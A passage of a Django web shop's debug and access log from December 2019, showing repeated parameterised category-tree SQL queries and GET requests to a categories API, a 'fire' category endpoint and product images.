"shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:12:22,985 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:12:22,988 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:12:22,990 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:12:22,994 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:12:22,996 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:12:22,999 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:12:23,001 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:12:23,003 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:12:23,007 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:12:23,009 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:12:23,011 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:12:23,013 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:12:23,016 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:12:23,018 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:12:23,021 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:12:23,023 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:12:23,026 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:12:23,029 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:12:23,031 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:12:23] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 06:15:13] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 06:15:25,555 utils 4252 140031732287232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-20 06:15:25,560 utils 4252 140031732287232 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [20/Dec/2019 06:15:25] "GET /api/v1/fire/ HTTP/1.0" 200 482 [20/Dec/2019 06:15:26] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [20/Dec/2019 06:15:26] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [20/Dec/2019 06:15:26] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 DEBUG 2019-12-20 06:16:02,536 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:16:02,542 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:16:02,545 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:16:02,548 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:16:02,551 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:16:02,553 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:16:02,556 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:16:02,558 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:16:02,560 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:16:02,563 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:16:02,565 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:16:02,568 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:16:02,570 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:16:02,572 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:16:02,575 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:16:02,577 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:16:02,580 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:16:02,582 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:16:02,584 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:16:02,588 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:16:02,590 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:16:02,592 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:16:02,594 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:16:02,596 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:16:02,599 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:16:02,602 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:16:02,604 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:16:02,607 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:16:02,609 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:16:02,611 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:16:02,615 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:16:02,617 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:16:02,619 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:16:02,621 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:16:02,624 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:16:02,627 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:16:02,629 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:16:02,632 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:16:02,634 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:16:02,636 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:16:02,638 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:16:02,641 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:16:02,643 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:16:02,645 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:16:02,648 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:16:02,650 utils 4252 140031732287232 